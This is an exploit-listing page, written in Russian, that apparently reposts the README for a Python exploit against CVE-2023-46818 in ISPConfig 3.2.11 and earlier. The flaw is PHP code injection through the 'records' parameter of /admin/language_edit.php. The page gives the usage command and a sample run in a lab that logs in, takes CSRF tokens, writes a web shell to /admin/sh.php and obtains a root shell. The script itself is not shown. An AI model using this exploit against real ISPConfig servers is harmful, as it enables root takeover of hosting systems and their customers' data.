Sploitus

Exploit for CVE-2023-46818

kitploit · 2026-08-30

Exploit Code

MARKDOWN41 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AJDUMANHUG-CVE-2023-46818
# CVE-2023-46818 Python Exploit

## 🔥 Описание

Этот скрипт эксплойта на Python нацелен на уязвимость безопасности в параметре `records` POST-запроса к `/admin/language_edit.php` в ISPConfig, который не фильтруется должным образом. Это позволяет аутентифицированному администратору внедрять и выполнять произвольный PHP-код.

## ⚠️ Уязвимые версии

Версия 3.2.11 и более ранние версии.

## ⚙️ Использование

root@kitploit:~
    
    
    python3 CVE-2023-46818.py <URL> <Имя_пользователя> <Пароль>
    

## 💻 Пример запуска

root@kitploit:~
    
    
    ┌──(motoh4ck3r㉿kali)-[~/HTB/Linux/nocturnal]
    └─$ python3 CVE-2023-46818.py http://127.0.0.1:8081 motoh4ck3r broombroom
    [+] Выполняется вход с именем пользователя 'motoh4ck3r' и паролем 'broombroom'
    [+] Вход выполнен успешно!
    [*] Получение CSRF-токенов...
    [+] CSRF ID: language_edit_92017c65f0bcba0f230f5cc1
    [+] CSRF Key: 7d06eed7d23c29e5c9633920a8122339d91373e8
    [+] Внедрение полезной нагрузки для shell...
    [+] Shell записан по адресу: http://127.0.0.1:8081/admin/sh.php
    [+] Запуск shell...
    
    ispconfig-shell# hostname & whoami & id
    nocturnal
    root
    uid=0(root) gid=0(root) groups=0(root)
    
    ispconfig-shell#